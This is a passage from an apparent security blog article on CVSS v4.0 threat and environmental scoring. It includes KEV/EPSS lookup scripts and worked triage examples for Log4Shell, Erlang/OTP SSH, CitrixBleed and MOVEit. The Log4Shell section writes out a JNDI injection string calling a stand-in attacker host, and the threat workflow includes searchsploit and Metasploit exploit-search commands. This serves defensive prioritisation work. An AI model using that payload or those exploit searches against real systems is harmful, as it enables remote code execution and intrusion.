deployment.</p><p><strong>Security Requirements (CR/IR/AR)</strong> — how important is CIA for this specific asset:</p><pre>High-criticality production payment API:<br>  CR:H / IR:H / AR:H  →  scores INCREASE relative to Base<br>  (This system is more important to protect than the vendor assumed)<br>Development test server (no real data, not customer-facing):<br>  CR:L / IR:L / AR:L  →  scores DECREASE relative to Base<br>  (This system is less important than the vendor assumed)</pre><p><strong>Modified Base Metrics (MAV, MAC, MAT, MPR, MUI, MVC, MVI, MVA, MSC, MSI, MSA)</strong> — override specific Base values to reflect actual deployment conditions. When a Modified metric is set, it replaces the corresponding Base metric in the score calculation:</p><pre>Vendor assumed: AV:N (any internet attacker)<br>Your reality:   MAV:A (system is behind a firewall, adjacent network only)<br>→ Score drops by ~1.5–2.5 points<br>Vendor assumed: AC:L (straightforward exploitation)<br>Your reality:   MAC:H (attacker must first bypass your MFA + VPN)<br>→ Score drops further</pre><h3>The CVSS Lifecycle: CVSS-B → CVSS-BT → CVSS-BTE</h3><p>FIRST.org describes CVSS v4.0 as a <strong>living score</strong> that matures as information becomes available. This lifecycle maps to organizational maturity and regulatory requirements.</p><pre>┌────────────────────────────────────────────────────────────────-──┐<br>│                    CVSS SCORING LIFECYCLE                         │<br>│                                                                   │<br>│  VENDOR PUBLISHES                                                 │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-B     │  Base metrics only                               │<br>│  │  (Worst     │  → Published in NVD, CVE records                 │<br>│  │   Case)     │  → Generic, deployment-independent               │<br>│  │  e.g. 9.8   │  → Produced by vendor/researcher                 │<br>│  └──────┬──────┘                                                  │<br>│         │  Add Threat Intelligence (CISA KEV, EPSS, ExploitDB)    │<br>│         ▼                                                         │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-BT    │  Base + Exploit Maturity                         │<br>│  │  (Current   │  → "Is this being exploited right now?"          │<br>│  │   Reality)  │  → Uses CISA KEV, EPSS, Metasploit, ExploitDB    │<br>│  │  e.g. 7.4   │  → Produced by consumer with threat intel        │<br>│  └──────┬──────┘                                                  │<br>│         │  Add Environmental Context (your network/data/controls) │<br>│         ▼                                                         │<br>│  ┌─────────────┐                                                  │<br>│  │  CVSS-BTE   │  Base + Threat + Environment                     │<br>│  │  (Your      │  → "How bad is this here, for us, today?"        │<br>│  │   Reality)  │  → Uses asset inventory, network topology,       │<br>│  │  e.g. 4.2   │     compensating controls, CIA requirements      │<br>│  └─────────────┘  → Produced by consumer security team            │<br>│                                                                   │<br>│  DECISION: Patch/Mitigate timeline based on CVSS-BTE severity     │<br>└─────────────────────────────────────────────────────────────────-─┘</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KHLh-trhN14bpEr3yK0z0w.png"></figure><p><strong>Practical implementation path:</strong> You do not need to achieve CVSS-BTE overnight. Start with CVSS-B (vendor score from NVD). Add Threat metrics when you have a threat intel program (CVSS-BT). Add Environmental metrics as you build asset inventory and network documentation (CVSS-BTE). Each layer improves decision quality.</p><h3>A Practical Scoring Workflow: Why Many Teams Go from CVSS-B → CVSS-BE → CVSS-BTE</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jyrczXiPUvm7eSD8eIaqbA.png"></figure><p>The formal CVSS v4.0 framework defines four valid score sets: <strong>CVSS-B</strong>, <strong>CVSS-BT</strong>, <strong>CVSS-BE</strong>, and <strong>CVSS-BTE</strong>. Each one serves a distinct purpose, and each one reflects a different level of contextual enrichment.</p><p>At the specification level, it is easy to think of scoring as a neat progression from <strong>Base</strong> to <strong>Base + Threat</strong> to <strong>Base + Threat + Environmental</strong>:</p><p><strong>CVSS-B → CVSS-BT → CVSS-BTE</strong></p><p>That sequence is formally correct.</p><p><strong>But in real vulnerability management operations, many teams do not actually work in that order.</strong></p><p>In practice, the more operationally useful path is often:</p><p><strong>CVSS-B → CVSS-BE → CVSS-BTE</strong></p><p>The reason is simple: in most organizations, <strong>environmental context is available immediately</strong>, while <strong>threat context often matures later</strong>.</p><p>When a new CVE is disclosed, you may not yet have reliable answers to threat-related questions such as:</p><ul><li>Is public exploit code available?</li><li>Is exploitation merely theoretical, or already practical?</li><li>Has the vulnerability been weaponized?</li><li>Is it being used opportunistically, selectively, or at scale?</li><li>Has it appeared in KEV, exploit feeds, or credible threat reporting?</li><li>Is there confirmed in-the-wild activity, or only early speculation?</li></ul><p>Those answers often arrive later — sometimes hours later, sometimes days later, and sometimes only after the vulnerability has already entered active exploitation cycles.</p><p>By contrast, your organization usually knows its own environment <strong>immediately</strong>.</p><p>The moment the CVE appears, you often already know:</p><ul><li>whether the affected asset is internet-exposed or reachable only internally</li><li>whether it sits in production, staging, development, or an isolated lab</li><li>whether the vulnerable service is accessible by untrusted users</li><li>whether segmentation, VPN-only access, jump hosts, WAFs, or other compensating controls reduce practical exposure</li><li>whether the affected system is business-critical, safety-relevant, or low-impact</li><li>whether downstream confidentiality, integrity, availability, or operational consequences actually matter in your environment</li><li>whether exploitation would affect a crown-jewel system or a low-value supporting component</li></ul><p>That means the <strong>Environmental</strong> dimension is often the first real opportunity to replace vendor-neutral worst-case assumptions with organization-specific reality.</p><p>In other words, many teams can move from <strong>Base</strong> to <strong>Base + Environmental</strong> on day one, even if threat intelligence is still incomplete.</p><p>That is why, in practical triage workflows, the sequence often becomes:</p><ol><li><strong>Start with CVSS-B</strong> to establish the vendor-neutral severity baseline.</li><li><strong>Apply Environmental metrics</strong> using known internal context to produce <strong>CVSS-BE</strong>.</li><li><strong>Add Threat metrics later</strong> as evidence matures, producing <strong>CVSS-BTE</strong>.</li></ol><p>This workflow is especially useful for <strong>newly disclosed vulnerabilities</strong>, where waiting for mature threat data can slow prioritization at exactly the moment fast decisions are needed.</p><p>It also reflects a core reality of vulnerability operations:</p><p><strong>Environmental context is usually local and immediate. Threat context is often external and delayed.</strong></p><p>That does <strong>not</strong> make <strong>CVSS-BT</strong> unimportant.</p><p>CVSS-BT remains a fully valid and useful score, especially for:</p><ul><li>threat-informed prioritization programs</li><li>dashboards that track exploitation pressure across large CVE sets</li><li>external reporting pipelines</li><li>security teams that heavily integrate KEV, exploit feeds, EPSS, or CTI into daily triage</li><li>situations where the threat picture is already mature, but local environmental scoring has not yet been completed</li></ul><p>But for many defenders, patch teams, asset owners, and risk managers, <strong>CVSS-BE is often the first score that actually reflects operational reality inside the organization</strong>.</p><p>A useful way to think about the score sets is this:</p><ul><li><strong>CVSS-B</strong> tells you the general, vendor-neutral worst-case severity</li><li><strong>CVSS-BE</strong> tells you what the vulnerability means in <em>your</em> environment</li><li><strong>CVSS-BTE</strong> tells you what it means in <em>your</em> environment under the <em>current threat landscape</em></li></ul><p>That distinction matters.</p><p>A vulnerability may look severe in abstract, but drop meaningfully once you account for isolation, segmentation, limited exposure, or low business impact. Another vulnerability may remain highly important even in a constrained environment because the affected asset is mission-critical. And once credible threat evidence appears — public exploitation, KEV inclusion, operational tooling, or real adversary use — the priority can rise again under <strong>BTE</strong>.</p><p>So while the formal model includes <strong>B</strong>, <strong>BT</strong>, <strong>BE</strong>, and <strong>BTE</strong> as parallel valid score sets, many real-world programs naturally operate in a different practical sequence:</p><p><strong>CVSS-B → CVSS-BE → CVSS-BTE</strong></p><p>That order is not a contradiction of the framework. It is simply how many teams apply the framework when immediate local context is available before complete external threat intelligence.</p><p>For that reason, if your goal is fast and defensible vulnerability triage, <strong>BE is often the first meaningful refinement of Base</strong>, and <strong>BTE becomes the fully contextualized score once both environment and threat are understood</strong>.</p><h3>Threat Metrics in Practice: KEV, EPSS, and Exploit Feeds</h3><h4>CISA Known Exploited Vulnerabilities (KEV) Catalog</h4><p>The KEV catalog is the gold standard for E:A determination. CISA adds a CVE only when it has confirmed, real-world exploitation evidence. As of March 2026, the catalog contains approximately 1,550+ CVEs — out of over 240,000 published CVEs in NVD. That is well under 1%.</p><pre># Check KEV via API — works immediately, no registration needed<br>curl -s "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json" \<br>  | python3 -c "<br>import json, sys<br>data = json.load(sys.stdin)<br>cve_id = 'CVE-2021-44228'<br>match = [v for v in data['vulnerabilities'] if v['cveID'] == cve_id]<br>if match:<br>    v = match[0]<br>    print(f'IN KEV: {v[\"vulnerabilityName\"]}')<br>    print(f'Due Date: {v[\"dueDate\"]}')<br>    print(f'Required Action: {v[\"requiredAction\"]}')<br>else:<br>    print('Not in KEV')<br>"<br># Output for Log4Shell:<br># IN KEV: Apache Log4j2 Remote Code Execution Vulnerability<br># Due Date: 2021-12-24<br># Required Action: Apply updates per vendor instructions.</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ojvuO08eeq7sHLCxfQT4DA.png"></figure><p><strong>Batch KEV check — Python with CSV output:</strong></p><pre>import json, requests, csv, sys<br>from datetime import datetime<br>def load_kev() -&gt; set:<br>    """Download and return the set of CVE IDs in CISA KEV."""<br>    url = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"<br>    response = requests.get(url, timeout=30)<br>    response.raise_for_status()<br>    return {v["cveID"]: v for v in response.json()["vulnerabilities"]}<br>def load_epss(cve_ids: list) -&gt; dict:<br>    """Fetch EPSS scores for a list of CVE IDs from FIRST.org API."""<br>    base_url = "https://api.first.org/data/v1/epss"<br>    scores = {}<br>    # API accepts comma-separated CVE IDs, max ~30 per request<br>    for i in range(0, len(cve_ids), 30):<br>        batch = ",".join(cve_ids[i:i+30])<br>        resp = requests.get(f"{base_url}?cve={batch}", timeout=30)<br>        if resp.ok:<br>            for item in resp.json().get("data", []):<br>                scores[item["cve"]] = float(item["epss"])<br>    return scores<br>def determine_exploit_maturity(cve_id: str, kev_data: dict, epss_scores: dict) -&gt; str:<br>    """<br>    Determine Exploit Maturity based on KEV and EPSS.<br>    Returns the CVSS v4.0 E: value.<br>    """<br>    if cve_id in kev_data:<br>        return "E:A"  # Confirmed active exploitation<br>    epss = epss_scores.get(cve_id, 0.0)<br>    if epss &gt;= 0.5:<br>        # EPSS ≥ 50% = high exploitation likelihood → strong POC signal<br>        return "E:P"<br>    elif epss &gt;= 0.1:<br>        # Moderate signal - verify against ExploitDB/Metasploit/GitHub<br>        return "E:P"<br>    else:<br>        # Low EPSS, not in KEV - no exploitation evidence<br>        return "E:U"<br># Example: Enrich a list of CVEs from your scanner<br>cves_from_scanner = [<br>    "CVE-2021-44228",  # Log4Shell<br>    "CVE-2023-4966",   # CitrixBleed<br>    "CVE-2023-34362",  # MOVEit SQLi<br>    "CVE-2024-21762",  # FortiOS SSL VPN<br>    "CVE-2025-32433",  # Erlang/OTP SSH<br>]<br>kev = load_kev()<br>epss = load_epss(cves_from_scanner)<br>print(f"{'CVE':&lt;20} {'KEV':&gt;5} {'EPSS':&gt;8} {'E Value':&lt;10}")<br>print("-" * 50)<br>for cve in cves_from_scanner:<br>    in_kev = "YES" if cve in kev else "NO"<br>    epss_score = epss.get(cve, 0.0)<br>    e_value = determine_exploit_maturity(cve, kev, epss)<br>    print(f"{cve:&lt;20} {in_kev:&gt;5} {epss_score:&gt;8.4f} {e_value:&lt;10}")</pre><h4>EPSS — The Probabilistic Complement to CVSS</h4><p>The <strong>Exploit Prediction Scoring System (EPSS)</strong> is a machine learning model maintained by FIRST.org that predicts the probability of a CVE being exploited in the wild within 30 days. It complements CVSS by answering a different question: not “how severe is the vulnerability?” but “how likely is it to be exploited soon?”</p><p><strong>EPSS characteristics:</strong></p><ul><li>Score range: 0.0 to 1.0 (probability)</li><li>Updated daily</li><li>Uses ML trained on NVD data, Metasploit module availability, ExploitDB entries, active threat feeds</li><li>Free API: <a href="https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX">https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX</a></li></ul><p><strong>How to combine CVSS + EPSS for prioritization:</strong></p><pre>Priority Matrix:<br>                    EPSS Low (&lt;0.1)    EPSS Medium (0.1-0.5)    EPSS High (&gt;0.5)<br>CVSS High/Critical   → Schedule          → Priority                → Immediate<br>CVSS Medium          → Backlog           → Schedule                → Priority<br>CVSS Low             → Accept/Ignore     → Backlog                 → Schedule<br><br>Real examples (approximate, as of early 2024):<br>  CVE-2021-44228 (Log4Shell):   CVSS 10.0, EPSS ~0.97 → Immediate<br>  CVE-2023-4966  (CitrixBleed): CVSS 9.4,  EPSS ~0.97 → Immediate<br>  CVE-2021-34527 (PrintNightm): CVSS 8.8,  EPSS ~0.96 → Immediate<br>  CVE-2023-34362 (MOVEit):      CVSS 9.8,  EPSS ~0.96 → Immediate<br>  Typical new CVE (no exploit): CVSS 7.5,  EPSS ~0.002 → Schedule/Backlog<br><br># Quick EPSS check for a CVE<br>curl -s "https://api.first.org/data/v1/epss?cve=CVE-2021-44228" \<br>  | python3 -c "import json,sys; d=json.load(sys.stdin); print(d['data'][0])"<br># {'cve': 'CVE-2021-44228', 'epss': '0.97530', 'percentile': '1.00000', 'date': '&lt;today&gt;'}<br># EPSS scores are updated daily - check the date field to confirm freshness</pre><h4>The Step-by-Step Threat Metric Determination Workflow</h4><pre>For each CVE in your scanner output:<br>Step 1: Check CISA KEV (30 seconds, fully automated)<br>  → IN KEV?  → Set E:A, mark as highest priority<br>  → NOT IN KEV? → Continue to Step 2<br>Step 2: Check EPSS score<br>  → EPSS ≥ 0.5?  → Strong exploitation likelihood → E:P at minimum<br>  → EPSS 0.1–0.5? → Moderate likelihood → E:P (verify against ExploitDB)<br>  → EPSS &lt; 0.1?  → Low likelihood → Continue to Step 3<br>Step 3: Check ExploitDB / Metasploit / GitHub<br>  searchsploit CVE-XXXX-XXXXX<br>  msfconsole -q -x "search cve:XXXX-XXXXX type:exploit; exit"<br>  → Module/exploit found? → E:P<br>  → Nothing found? → Continue to Step 4<br>Step 4: Default assignment<br>  → No KEV, no EPSS signal, no public exploit → E:U</pre><h3>Environmental Metrics: Scoring for Your Environment</h3><h4>The Core Principle</h4><p>A vulnerability vendor scores a system as if it is:</p><ul><li>Directly accessible from the internet (AV:N)</li><li>Running with no compensating controls</li><li>Processing your most sensitive data</li><li>Able to reach any system in your network</li></ul><p>Your security team knows this is almost never true for any given system. Environmental metrics encode that knowledge as documented, auditable adjustments.</p><h4>Practical Environmental Metric Decisions</h4><p><strong>Decision 1: Network Exposure</strong></p><pre>Vendor scored: AV:N (reachable from anywhere on the internet)<br>Scenario A - Internet-facing server:<br>  No change needed. AV:N reflects reality.<br>Scenario B - Internal VLAN, firewall-controlled:<br>  MAV:A (Modified Attack Vector: Adjacent)<br>  Documentation: "System resides on VLAN 10, firewall rule FW-2041 blocks<br>  all inbound access from WAN. Last verified: [date], Change ticket: [ID]"<br>  Score effect: -1.5 to -2.5 points typically<br>Scenario C - Jump host required, no direct network path:<br>  MAV:L (Modified Attack Vector: Local)<br>  Documentation: "SSH access only via jump-host JUMP-01, no direct routing<br>  from any external zone. Network diagram: NDG-004"<br>  Score effect: more significant reduction</pre><p><strong>Decision 2: Compensating Security Controls</strong></p><pre>Vendor scored: AC:L (low complexity — straightforward exploitation)<br>Your reality: system access requires:<br>  (1) VPN authentication with hardware MFA token<br>  (2) Jump host with session recording<br>  (3) IP allowlisting to specific bastion hosts<br>→ MAC:H (Modified Attack Complexity: High)<br>  "Exploiting this in our environment requires bypassing enterprise VPN<br>  (MFA-protected), jump host IP filtering, and session monitoring.<br>  Policy reference: NET-POLICY-022"</pre><p><strong>Decision 3: Data Sensitivity</strong></p><pre>Vendor scored: VC:H (high confidentiality impact — assumes worst-case data)<br>Scenario A - System processes PII, financial, or health data:<br>  No change. VC:H is appropriate.<br>  Consider setting CR:H to amplify the score.<br>Scenario B - System is a build server, processes only source code and<br>artifact hashes, no customer data:<br>  MVC:L (Modified Vulnerable System Confidentiality: Low)<br>  Documentation: "System data classification: Internal/Technical per<br>  DLP-2023. No PII, financial, or regulated data categories."</pre><p><strong>Decision 4: Blast Radius (Subsequent System Impact)</strong></p><pre>Vendor scored: SC:H/SI:H/SA:H (can affect downstream systems)<br>Your reality: this system has no outbound connections except to its<br>own read-only database. No service accounts with lateral movement<br>potential. Network segmentation enforced by firewall.<br>MSC:N / MSI:N / MSA:N<br>Documentation: "System [ID] network connections: inbound from [A,B],<br>outbound to [DB-READONLY] only. Firewall egress rules [FW-2201 through<br>FW-2203] block all other outbound. Network architecture diagram NDG-007."</pre><p><strong>Decision 5: Security Requirements — Adjusting for Asset Criticality</strong></p><p>Security Requirements (CR/IR/AR) work differently from Modified Base metrics. Instead of overriding vendor assumptions, they adjust the score up or down based on how important CIA is for this asset in your organization:</p><pre>High-criticality asset (production customer database):<br>  CR:H / IR:H / AR:H<br>  → Score increases above the environmental-adjusted Base<br>  → The same vulnerability is MORE severe here than the vendor assumed<br>Low-criticality asset (developer test environment):<br>  CR:L / IR:L / AR:L<br>  → Score decreases below the environmental-adjusted Base<br>  → The same vulnerability is LESS severe here<br>Same vulnerability, CVE-2023-44487 (HTTP/2 Rapid Reset):<br>  On production CDN edge:  BTE = 8.9 High (AR:H - availability critical)<br>  On dev test instance:    BTE = 3.2 Low  (AR:L - availability optional)</pre><h4>Environmental Adjustment Documentation Template</h4><pre>CVE: [CVE-XXXX-XXXXX]<br>Asset: [system name / ID]<br>Asset Classification: [Confidentiality: L/M/H] [Integrity: L/M/H] [Availability: L/M/H]<br>Base Vector (from NVD):<br>  [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H]<br>  Base Score: [10.0 Critical]<br>Threat Enrichment:<br>  E: [A/P/U] - Source: [CISA KEV / ExploitDB EDB-XXXXX / No evidence]<br>  EPSS: [score] - Percentile: [XX]th<br>Environmental Adjustments:<br>  [MAV:A] - [System on internal VLAN, not internet-accessible. Evidence: FW-RULE-XXXX]<br>  [MAC:H] - [Access requires MFA VPN. Evidence: POLICY-NET-022]<br>  [MSC:N/MSI:N/MSA:N] - [Isolated system, no lateral movement paths. Evidence: NDG-007]<br>BTE Vector:<br>  [CVSS:4.0/.../E:P/MAV:A/MAC:H/MSC:N/MSI:N/MSA:N]<br>  BTE Score: [5.9 Medium]<br>Approved by: [Name, Title]<br>Date: [YYYY-MM-DD]<br>Next Review: [YYYY-MM-DD or "on next change event"]<br>Change Ticket: [TICKET-ID]</pre><h3>Worked Example 1: CVE-2021–44228 Log4Shell — Score Evolution Over 72 Hours</h3><p>Log4Shell is the canonical example of a 10.0 Critical vulnerability that genuinely deserved its score and its emergency response. It also illustrates why CVSS scores must be treated as dynamic, not static.</p><h4>The Vulnerability</h4><p><strong>CVE-2021–44228</strong> — Apache Log4j2 JNDI injection, disclosed December 9–10, 2021. Log4j2 is a ubiquitous Java logging library used in virtually every Java application stack. The vulnerability allowed unauthenticated remote code execution by logging a specially crafted string like ${jndi:ldap://attacker.com/exploit}.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Reading the vector:<br>  AV:N   - Any internet attacker can reach Log4j (it processes log input from requests)<br>  AC:L   - One malicious string in any logged field (User-Agent, username, etc.)<br>  AT:N   - No special deployment conditions; Log4j's default config enables JNDI lookup<br>  PR:N   - Unauthenticated; the string is logged before any auth check<br>  UI:N   - No user interaction<br>  VC:H   - Full compromise of the JVM process (RCE)<br>  VI:H   - Arbitrary code execution = arbitrary data modification<br>  VA:H   - Process crash or disruption possible<br>  SC:H   - Applications run with broad permissions; lateral movement to databases,<br>           APIs, secrets vaults is documented in nearly every case study<br>  SI:H   - Downstream integrity compromise confirmed in attacks<br>  SA:H   - Downstream availability impact confirmed<br>Base Score: 10.0 Critical</pre><h4>Hour 0: Disclosure (December 9, 2021)</h4><pre>CVSS-B:  10.0 Critical (vendor-published score)<br>E:       X (Not Defined) — no public exploit yet at moment of NVD publication<br>Security team action with default (E:X):<br>  Scanner shows 10.0 - emergency response initiated<br>  This is CORRECT. E:X defaults to E:A, and JNDI proof-of-concept<br>  was already circulating in private channels at disclosure.</pre><h4>Hour 12–24: PoC Goes Public</h4><p>By December 10–11, multiple working proof-of-concept exploits appeared on GitHub. Mass scanning for vulnerable Log4j endpoints began within hours.</p><pre>Threat update: E:P (POC publicly available)<br>EPSS: immediately climbs toward 0.90+<br>CVSS-BT: still 10.0 Critical (E:P keeps score near maximum)<br>What changed operationally: The window for "orderly patching" closed.<br>Evidence of active scanning meant any vulnerable internet-facing system<br>was being actively probed.</pre><h4>Hour 48–72: Mass Exploitation — Botnets, Ransomware, State Actors</h4><p>By December 11–13, CISA confirmed active exploitation. The KEV catalog entry was published with a remediation due date of December 24, 2021 (for federal agencies). NSA, GCHQ, and CISA issued joint advisories. Threat actors confirmed exploiting Log4Shell included Conti ransomware affiliates, Iranian state actors (APT35/Charming Kitten), Chinese state actors, and multiple criminal groups.</p><pre>Threat update: E:A (actively exploited — CISA KEV confirmed)<br>CVSS-BT: 10.0 Critical (E:A maximum)<br>Any environmental adjustment to MAV or MAC must be verified:<br>  "Is this system actually isolated from the internet?"<br>  → Internet-facing: 10.0 - immediate patch, no exceptions<br>  → Internal, no JNDI enabled: consider E:P + MAV:A → ~7.4 High<br>  → Internal, JNDI disabled in Log4j config: document mitigation as<br>    compensating control; MAT:P or MAC:H may apply<br>Note: CVE-2021-45046 (bypass for initial mitigations) and<br>CVE-2021-45105 (DoS) were published within days, complicating patching.</pre><h4>Final Score Comparison: Same CVE, Different Contexts</h4><p><strong>Key lesson:</strong> Even for a genuine 10.0 emergency, environmental context changes the <em>response mechanism</em> even when it cannot reduce the overall priority. An internet-facing production server and an internal test instance require different actions, documented by CVSS-BTE.</p><h3>Worked Example 2: CVE-2025–32433 Erlang/OTP SSH — From 10.0 to 5.9</h3><p>CVE-2025–32433 is an unauthenticated pre-auth RCE in Erlang/OTP’s SSH server. Base score 10.0. This example demonstrates how environmental context appropriately reduces emergency response to scheduled patching.</p><h4>Step 0: The Base Score (NVD Published)</h4><pre>Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score:  10.0 Critical<br>Reading the vector:<br>  AV:N  - SSH is exposed (vendor assumes internet-facing, worst case)<br>  AC:L  - Exploitation is straightforward once you reach the SSH port<br>  AT:N  - No special configuration required; default OTP SSH setup is vulnerable<br>  PR:N  - Pre-authentication RCE - no credentials needed<br>  UI:N  - No user interaction required<br>  VC:H  - Full code execution on the Erlang/OTP process<br>  VI:H  - Attacker can write files, modify state<br>  VA:H  - Can crash or kill the OTP application<br>  SC:H  - Erlang applications often manage distributed systems; lateral pivot possible<br>  SI:H, SA:H - Downstream system compromise possible</pre><h4>Step 1: Modify Attack Vector — Is SSH Actually Exposed?</h4><pre>Question: Is this Erlang/OTP SSH service accessible from the internet?<br>Scenario A - Internet-facing (load balancer → Erlang cluster):<br>  No change. AV:N is accurate. Score: 10.0.<br>  This is a genuine emergency. Patch or firewall the port immediately.<br>Scenario B - Internal cluster, accessible from corporate network only:<br>  MAV:A (Modified Attack Vector: Adjacent)<br>  Evidence: Firewall rule FW-1042, network topology confirms no external routing.<br>  Updated vector: CVSS:4.0/.../MAV:A<br>  Updated score:  9.4 Critical<br>  Still Critical - but attacker must have already penetrated your perimeter.<br>  Different threat model.</pre><h4>Step 2: Add Attack Complexity — Compensating Controls</h4><pre>In many corporate deployments, SSH access also requires:<br>  - VPN connection with hardware token MFA<br>  - Jump host (bastion server) with session recording<br>  - IP allowlist restricting to specific admin hosts<br>→ MAC:H (Modified Attack Complexity: High)<br>Updated vector: CVSS:4.0/.../MAV:A/MAC:H<br>Updated score:  8.7 High<br>Now in High tier - 30-day SLA instead of a 24–72 hour emergency response.</pre><h4>Step 3: Add Threat Intelligence</h4><pre>Checking sources (as of initial disclosure):CISA KEV: Not listed (at time of initial disclosure)<br>EPSS:     ~0.04 initially (low exploitation probability, no weaponized exploit yet)<br>ExploitDB: No entry yet<br>GitHub:   POC repositories appeared within days of disclosure (search CVE-2025-32433)<br>→ E:P (Proof of Concept exists, not yet actively exploited in wild)<br>Updated vector: CVSS:4.0/.../E:P/MAV:A/MAC:H<br>Updated score:  7.4 High<br>If KEV entry appears: immediately reclassify to E:A → score rises back toward 9.0<br></pre><h4>Step 4: Assess Subsequent System Impact</h4><pre>Question: Can this Erlang/OTP node reach sensitive downstream systems?<br>Scenario A - Erlang node manages distributed message queue with connections<br>to all application databases:<br>  No change to SC/SI/SA - the blast radius is real.<br>  Score stays at 7.4 High.<br>Scenario B - Isolated analytics Erlang node, read-only DB access,<br>no write access to production systems:<br>  MSC:L / MSI:N / MSA:L<br>  "Node only reads from replica DB, no write paths, no service account<br>  with production access. Network egress rules FW-2089 confirmed."<br>  Updated score: ~6.1 Medium</pre><h4>Final Comparison Table</h4><p><strong>The takeaway:</strong> A genuine 10.0 pre-auth RCE becomes a 5.9 Medium for an internal, MFA-protected, isolated node with no active exploit. That is not negligence — that is accurate risk modeling.</p><h3>Worked Example 3: Firmware Report — 18 Criticals Become Medium</h3><p>This example demonstrates how Environmental metrics transform a firmware scanner report into an actionable prioritized list.</p><h4>The Problem</h4><p>A firmware scan of an industrial IoT sensor returns:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/587/1*eY9fGmcZJ_M1qajmdHXeBg.png"></figure><p>The raw scanner output shows 3 Critical CVEs and 13 High CVEs — all requiring immediate response under Base-only scoring.</p><h4>The Device Context</h4><ul><li>Industrial flow sensor on a process control OT network</li><li><strong>Not internet-accessible</strong> — connected only to local OT subnet</li><li>Read-only sensor data; no PII, no financial data</li><li>No GUI, no interactive user sessions</li><li>Vendor scored all CVEs assuming internet-facing deployment (BusyBox can be deployed anywhere)</li></ul><h4>Key Environmental Adjustment: MAV:A</h4><p>BusyBox CVEs with AV:N assume the applet is accessible from the internet. On this sensor, it is accessible only from the adjacent OT subnet. Single adjustment: MAV:A.</p><p><strong>Before and After</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/575/1*BlS9ghtDCXWr-Lc5OjtY9A.png"></figure><p><strong>Summary transformation:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/575/1*97sxvbu02pAvKM1TZBlSCQ.png"></figure><p><strong>Result:</strong> The 3am emergency patching requirement disappears. The highest-priority items are now High severity, manageable within the next OT maintenance window. A team that was facing a weekend emergency now has a structured, scheduled response.</p><h4>Important Caveat: Safety Metrics for OT</h4><p>If this sensor is part of a safety-critical process control system (chemical plant, power grid, water treatment), add the Supplemental Safety metric:</p><pre>/S:P (Safety: Present)<br>This does not change the CVSS score. But it flags to any responder<br>that exploitation could have physical safety consequences - and those<br>consequences must be evaluated against the CVSS-BTE severity.<br>A CVSS-BTE 6.5 Medium with S:P on a safety controller may require<br>faster response than a 7.9 High with S:N on an admin workstation.</pre><h3>Worked Example 4: CitrixBleed, MOVEit, FortiOS</h3><p>Three real-world cases from 2023–2024 that illustrate different CVSS adjustment scenarios.</p><h4>Case A: CVE-2023–4966 — CitrixBleed (Citrix NetScaler)</h4><p><strong>Vulnerability:</strong> Sensitive information disclosure in Citrix NetScaler Application Delivery Controller (ADC) and Gateway. An unauthenticated attacker could retrieve session tokens, enabling session hijacking without credentials. Used extensively by ransomware affiliates (LockBit, Medusa) and government-sector attackers.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H<br>Base Score: 9.4 Critical<br>Reading the base vector:<br>  AV:N  - NetScaler is internet-facing by design (it is a load balancer/VPN endpoint)<br>  AC:L  - Single HTTP request to /gwtest/formssso endpoint<br>  AT:N  - No special preconditions; affects default configuration<br>  PR:N  - Unauthenticated<br>  UI:N  - No user interaction<br>  VC:H  - Session token retrieved → full user account access<br>  VI:N  - The vulnerability itself doesn't modify data on NetScaler<br>  VA:N  - No availability impact from session theft<br>  SC:H  - Session tokens enable access to downstream internal resources<br>  SI:H  - Attacker with stolen session can modify data in downstream systems<br>  SA:H  - Downstream systems can be disrupted<br>CISA KEV: Added October 18, 2023 (within weeks of disclosure)<br>EPSS: ~0.97+ (extremely high, immediate mass exploitation)<br>Threat actors: LockBit affiliate, Boeing breach (confirmed), Allen &amp; Overy, more</pre><p><strong>Environmental scoring for an external-facing Citrix deployment:</strong></p><pre>For a typical enterprise with internet-facing NetScaler:<br>  E:A  — In CISA KEV, confirmed ransomware exploitation<br>BTE (no modification possible - it IS internet-facing):<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:A<br>Score: 9.4 Critical - Immediate response required.<br>No environmental adjustment can justify delay here.<br>If you have an internet-facing NetScaler, this requires a 24–72 hour emergency response.</pre><p><strong>Key operational point:</strong> CitrixBleed demonstrates why E:A (CISA KEV entry) must immediately override any environmental reduction arguments. The question is not "is our NetScaler important enough to patch quickly?" The question is "are there ransomware groups scanning for CitrixBleed right now?" The answer (confirmed by CISA, FBI, and multiple incident response reports) was: yes.</p><h4>Case B: CVE-2023–34362 — MOVEit Transfer SQLi</h4><p><strong>Vulnerability:</strong> SQL injection in Progress Software’s MOVEit Transfer managed file transfer platform. Exploited exclusively by the Cl0p ransomware group in a coordinated mass-exploitation campaign in May–June 2023. Affected 2,000+ organizations globally, including government agencies, hospitals, and financial firms.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.8 Critical<br>Key characteristics:<br>  AT:N - Default configuration is vulnerable<br>  AU:Y (Supplemental: Automatable: Yes) - Cl0p used automated mass exploitation<br>  V:C  (Supplemental: Value Density: Concentrated) - File transfer platforms hold<br>       files from MANY organizations → single compromise = mass data access</pre><p><strong>The supply chain scoring 